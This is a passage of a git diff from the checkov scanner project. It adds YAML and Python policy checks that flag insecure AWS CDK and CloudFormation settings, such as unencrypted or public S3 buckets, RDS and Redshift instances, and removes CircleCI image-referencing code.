Any]]", jmespath.search(keyword, workflow)) - for result in results: - image_name = result.get("image", None) - if image_name: - image_obj = Image( - file_path=file_path, - name=image_name, - start_line=result["__startline__"], - end_line=result["__endline__"], - ) - images.add(image_obj) - - def add_root_image( - self, file_path: str, images: set[Image], workflow_line_numbers: list[tuple[int, str]], workflow: dict[str, Any] - ) -> None: - root_image = workflow.get("image", "") + @staticmethod + def _parse_file( + f: str, file_content: str | None = None + ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: + if Runner.is_workflow_file(f): + return YamlRunner._parse_file(f) - if root_image: - for line_number, line_txt in workflow_line_numbers: - if "image" in line_txt and not line_txt.startswith(" "): - image_obj = Image( - file_path=file_path, - name=root_image, - start_line=line_number, - end_line=line_number, - ) - images.add(image_obj) + return None diff --git a/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml new file mode 100644 index 00000000000..6d6792fa95b --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_366 + name: Ensure that RDS instances have Multi-AZ enabled + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, multiAZ: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, multiAZ: true ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml new file mode 100644 index 00000000000..a4f215f4631 --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_367 + name: Ensure all data stored in RDS is not publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, publicly_accessible: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, publicly_accessible: true ,)' diff --git a/checkov/cdk/checks/typescript/RedShiftSSL.yaml b/checkov/cdk/checks/typescript/RedShiftSSL.yaml new file mode 100644 index 00000000000..d446b6b7df4 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedShiftSSL.yaml @@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_369 + name: Ensure Redshift uses SSL + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $REDSHIFT.CfnClusterParameterGroup() + conditions: + - not_pattern: | + "new $REDSHIFT.CfnClusterParameterGroup(, require_ssl: 'true', )" + - pattern: | + "new CfnClusterParameterGroup(, require_ssl: 'true', )" + conditions: + - not_pattern: | + "new CfnClusterParameterGroup(, require_ssl: 'true', )" diff --git a/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml new file mode 100644 index 00000000000..a1660a2b98b --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml @@ -0,0 +1,23 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_368 + name: Ensure all data stored in the Redshift cluster is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: | + 'new $FUNC(, encrypted: false ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - pattern: | + 'new $REDSHIFT.$FUNC(, encrypted: false ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml new file mode 100644 index 00000000000..c8de486aa80 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_370 + name: Ensure Redshift Cluster logging is enabled + category: LOGGING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, logging_properties: $FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, logging_properties: $REDSHIFT.$FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml new file mode 100644 index 00000000000..df862542b8a --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml @@ -0,0 +1,23 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_371 + name: Redshift cluster should not be publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: | + 'new $FUNC(, publiclyAccessible: true ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - pattern: | + 'new $REDSHIFT.$FUNC(, publiclyAccessible: true ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml new file mode 100644 index 00000000000..fd1d7802457 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_372 + name: Ensure Redshift is not deployed outside of a VPC + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, clusterSubnetGroupName: $ARG ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, clusterSubnetGroupName: $ARG ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml new file mode 100644 index 00000000000..209318c4ad3 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicACLs.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_373 + name: Ensure S3 bucket has block public ACLS enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, blockPublicAcls: true ,)' + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, blockPublicAcls: true ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml new file mode 100644 index 00000000000..a53903283f8 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BlockPublicPolicy.yaml @@ -0,0 +1,33 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_374 + name: Ensure S3 bucket has block public policy enabled + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $FUNC(, accessControl: 'Private' ,)" + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - patterns: + or: + - not_pattern: | + 'new $S3.$FUNC(, publicReadAccess: false ,)' + - not_pattern: | + "new $S3.$FUNC(, accessControl: 'Private' ,)" \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml new file mode 100644 index 00000000000..b3c7155e777 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketEncryption.yaml @@ -0,0 +1,30 @@ +metadata: + version: 0.2 + id: CKV_AWS_375 + name: Ensure all data stored in the S3 bucket is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(BucketEncryption.KMS_MANAGED|BucketEncryption.S3_MANAGED|BucketEncryption.KMS) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)($S3.BucketEncryption.KMS_MANAGED|$S3.BucketEncryption.S3_MANAGED|$S3.BucketEncryption.KMS) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml new file mode 100644 index 00000000000..930a83fc60e --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketKMSEncryption.yaml @@ -0,0 +1,29 @@ +metadata: + version: 0.2 + id: CKV_AWS_376 + name: Ensure that S3 buckets are encrypted with KMS by default + category: ENCRYPTION +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(aws_cdk.aws_s3.BucketEncryption.KMS_MANAGED|aws_cdk.aws_s3.BucketEncryption.KMS) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, encryption: $METHOD ,)' + conditions: + - metavariable: $METHOD + regex: (?i)(aws_cdk.aws_s3.BucketEncryption.KMS_MANAGED|aws_cdk.aws_s3.BucketEncryption.KMS) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketLogging.yaml b/checkov/cdk/checks/typescript/S3BucketLogging.yaml new file mode 100644 index 00000000000..cdd8dc0ec01 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketLogging.yaml @@ -0,0 +1,29 @@ +metadata: + version: 0.2 + id: CKV_AWS_377 + name: Ensure the S3 bucket has access logging enabled + category: LOGGING +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, serverAccessLogsBucket: $BUCKET.$LOGGER() ,)' + conditions: + - metavariable: $LOGGER + regex: (?i)(fromBucketArn|fromBucketAttributes|fromBucketName|fromBucketRegionalAttributes|fromBucketUrl) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, serverAccessLogsBucket: $S3.$BUCKET.$LOGGER() ,)' + conditions: + - metavariable: $LOGGER + regex: (?i)(fromBucketArn|fromBucketAttributes|fromBucketName|fromBucketRegionalAttributes|fromBucketUrl) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml new file mode 100644 index 00000000000..fd23f6e97a8 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketPublicAccessBlock.yaml @@ -0,0 +1,30 @@ +metadata: + version: 0.2 + id: CKV_AWS_378 + name: Ensure that S3 bucket has a Public Access block + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, blockPublicAccess: BlockPublicAccess.$ATR ,)' + conditions: + - metavariable: $ATR + regex: (?i)(BLOCK_ALL|BLOCK_ACLS|BLOCK_POLICY|RESTRICTED) + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, blockPublicAccess: $S3.BlockPublicAccess.$ATR ,)' + conditions: + - metavariable: $ATR + regex: (?i)(BLOCK_ALL|BLOCK_ACLS|BLOCK_POLICY|RESTRICTED) diff --git a/checkov/cdk/checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml new file mode 100644 index 00000000000..5fea1f3bc41 --- /dev/null +++ b/checkov/cdk/checks/typescript/S3BucketVersioning.yaml @@ -0,0 +1,24 @@ +metadata: + version: 0.2 + id: CKV_AWS_379 + name: Ensure all data stored in the S3 bucket have versioning enabled + category: BACKUP_AND_RECOVERY + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $FUNC(, versioned: true ,)' + - pattern: new $S3.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(Bucket|CfnBucket) + - not_pattern: | + 'new $S3.$FUNC(, versioned: true ,)' diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml deleted file mode 100644 index 72629895e79..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketEncryption.yaml +++ /dev/null @@ -1,47 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_19 - name: Ensure all data stored in the S3 bucket is securely encrypted at rest - category: ENCRYPTION -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.UNENCRYPTED, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.UNENCRYPTED, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml deleted file mode 100644 index 92b1dd0bf49..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketKMSEncryption.yaml +++ /dev/null @@ -1,57 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_145 - name: Ensure that S3 buckets are encrypted with KMS by default - category: ENCRYPTION -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket, BucketEncryption } from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new Bucket(..., {..., encryption: BucketEncryption.$ENCRYPTION, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - or: - - and: - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ANY_VAR, ...}, ...)" - - and: - - cond_type: variable - variable: $ENCRYPTION - operator: regex_match - value: ^(S3_MANAGED|UNENCRYPTED)$ - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(..., {..., encryption: $Y.BucketEncryption.$ENCRYPTION, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml deleted file mode 100644 index 702c8662e6b..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketLogging.yaml +++ /dev/null @@ -1,37 +0,0 @@ -metadata: - version: 0.1 - id: CKV_AWS_18 - name: Ensure the S3 bucket has access logging enabled - category: LOGGING -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., serverAccessLogsBucket: $ANY_VAR, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml deleted file mode 100644 index e681a928245..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketPublicAccessBlock.yaml +++ /dev/null @@ -1,37 +0,0 @@ -metadata: - version: 0.1 - id: CKV2_AWS_6 - name: Ensure that S3 bucket has a Public Access block - category: NETWORKING -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., blockPublicAccess: $ANY_VAR, ...}, ...)" diff --git a/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml b/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml deleted file mode 100644 index 0bad75c3468..00000000000 --- a/checkov/cdk/legacy_checks/typescript/S3BucketVersioning.yaml +++ /dev/null @@ -1,37 +0,0 @@ -metadata: - version: '0.1' - id: CKV_AWS_21 - name: Ensure all data stored in the S3 bucket have versioning enabled - category: BACKUP_AND_RECOVERY -scope: - languages: - - javascript - - typescript -definition: - - or: - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import { Bucket } from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new Bucket(..., {..., versioned: true, ...}, ...)" - - and: - - cond_type: filter - attribute: pattern - operator: within - value: | - import * as $Y from "aws-cdk-lib/aws-s3" - ... - - cond_type: pattern - operator: equals - value: "new $Y.Bucket(...)" - - cond_type: pattern - operator: not_equals - value: "new $Y.Bucket(..., {..., versioned: true, ...}, ...)" diff --git a/checkov/cdk/runner.py b/checkov/cdk/runner.py index 360f70c1a69..32c03c28096 100644 --- a/checkov/cdk/runner.py +++ b/checkov/cdk/runner.py @@ -35,6 +35,7 @@ def run( for lang in CDKLanguages.set(): self.cdk_langs.append(lang) + reports = super().run( root_folder=root_folder, external_checks_dir=external_checks_dir, diff --git a/checkov/circleci_pipelines/image_referencer/__init__.py b/checkov/circleci_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/circleci_pipelines/image_referencer/manager.py b/checkov/circleci_pipelines/image_referencer/manager.py deleted file mode 100644 index 3b4dede972a..00000000000 --- a/checkov/circleci_pipelines/image_referencer/manager.py +++ /dev/null @@ -1,12 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class CircleCIImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - provider = CircleCIProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/circleci_pipelines/image_referencer/provider.py b/checkov/circleci_pipelines/image_referencer/provider.py deleted file mode 100644 index 04e37861811..00000000000 --- a/checkov/circleci_pipelines/image_referencer/provider.py +++ /dev/null @@ -1,50 +0,0 @@ -from __future__ import annotations - -from typing import Any, cast -import jmespath -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE -from checkov.yaml_doc.runner import Runner - - -class CircleCIProvider(WorkflowImageReferencerProvider): - __slots__ = ("workflow_config", "file_path") - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - super().__init__(workflow_config, file_path) - - def generate_resource_key(self, start_line: int, end_line: int, tag: str) -> str: - sub_name = Runner.resolve_sub_name(self.workflow_config, start_line, end_line, tag) - if not sub_name: # Failed to locate the resource in the config file - return '' - image_name = Runner.resolve_image_name(self.workflow_config[tag][sub_name], start_line, end_line) - new_key = f'{tag}({sub_name}).docker.image{image_name}' if sub_name else tag - return new_key - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - keywords = ( - ('jobs', "jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ('executors', "executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ) - for tag, keyword in keywords: - results = cast("list[dict[str, Any]]", jmespath.search(keyword, self.workflow_config)) - if not results: - continue - for result in results: - image_name = result.get("image") - if image_name: - resource_id = self.generate_resource_key(result[START_LINE], result[END_LINE], tag) - if resource_id: - images.append( - Image( - file_path=self.file_path, - name=image_name, - start_line=result[START_LINE], - end_line=result[END_LINE], - related_resource_id=resource_id, - ) - ) - return images diff --git a/checkov/circleci_pipelines/runner.py b/checkov/circleci_pipelines/runner.py index 438f5e76acc..5fe6eafe297 100644 --- a/checkov/circleci_pipelines/runner.py +++ b/checkov/circleci_pipelines/runner.py @@ -4,22 +4,18 @@ import os from typing import TYPE_CHECKING, Any, Iterable -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.output.report import CheckType, Report from checkov.circleci_pipelines.registry import registry -from checkov.common.util.type_forcers import force_dict +from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry - from networkx import DiGraph WORKFLOW_DIRECTORY = "circleci" -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.CIRCLECI_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: @@ -89,37 +85,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file_path, config in definitions.items(): - _config = force_dict(config) or {} - if not config: - continue - manager = CircleCIImageReferencerManager(workflow_config=_config, file_path=file_path) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..b290a69deb8 --- /dev/null +++ b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml @@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - AWS::SageMaker::NotebookInstance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - AWS::SageMaker::NotebookInstance + connected_resource_types: + - AWS::IAM::Role + operator: exists + - cond_type: attribute + resource_types: + - AWS::IAM::Role + attribute: "AssumeRolePolicyDocument.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..ac11a53234c --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py @@ -0,0 +1,28 @@ +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitoUnauthenticatedIdentities(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access" + id = "CKV_AWS_366" + supported_resources = ('AWS::Cognito::IdentityPool',) + categories = (CheckCategories.IAM,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED, + ) + + def get_expected_value(self) -> Any: + return False + + def get_inspected_key(self) -> str: + return 'Properties/AllowUnauthenticatedIdentities' + + +check = CognitoUnauthenticatedIdentities() diff --git a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index 39a5a1a0f31..6bddcecb7a1 100644 --- a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py @@ -23,7 +23,8 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: """ properties = conf. get("Properties") if properties and isinstance(properties, dict): - if "TransitEncryptionEnabled" in properties.keys() and "AuthToken" in properties.keys(): + if "TransitEncryptionEnabled" in properties.keys() and ("AuthToken" in properties.keys() or + "UserGroupIds" in properties.keys()): if conf["Properties"]["TransitEncryptionEnabled"]: return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py new file mode 100644 index 00000000000..daf78957202 --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py @@ -0,0 +1,26 @@ +from typing import List + +from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories + + +class SagemakerNotebookEncryptedWithCMK(BaseResourceValueCheck): + def __init__(self): + name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)" + id = "CKV_AWS_187" + supported_resources = ("AWS::SageMaker::NotebookInstance", "AWS::SageMaker::Domain") + categories = [CheckCategories.ENCRYPTION] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return 'Properties/KmsKeyId' + + def get_expected_value(self): + return ANY_VALUE + + def get_evaluated_keys(self) -> List[str]: + return ['Properties/KmsKeyId'] + + +check = SagemakerNotebookEncryptedWithCMK() diff --git a/checkov/common/bridgecrew/integration_features/features/custom_policies_integration.py 